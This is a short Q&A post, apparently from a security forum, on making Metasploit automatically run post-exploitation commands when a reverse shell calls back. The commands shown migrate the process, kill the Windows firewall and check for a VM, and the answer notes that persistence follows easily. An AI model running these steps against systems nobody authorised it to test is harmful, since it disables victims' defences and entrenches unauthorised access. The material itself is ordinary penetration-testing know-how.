# Metasploit: Is it possible to automatically kick off a script on a reverse-shell callback?

Tags: metasploit

Is it possible to automatically kick of a Metasploit script when a TCP Reverse Shell connection connects back into the handler?

e.g. Reverse-Shell connects back in, automatically kick off a script that will make the connection persistent.

Answer (score 2, accepted):

Yes. You can do this using the AutoRunScript function.

```
set AutoRunScript multi_console_command -rc /root/commands.rc
```

Where /root/commands.rc contains the commands you with to run.

For example

```
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
```

From this point it would be trivial to gain persistence.

For more information check these resources:

[Autoscript](https://offensiveinfosec.wordpress.com/tag/autorunscript/)

[Metasploit automatic module execution on receival of shell?](https://security.stackexchange.com/questions/101309/metasploit-automatic-module-execution-on-receival-of-shell?rq=1)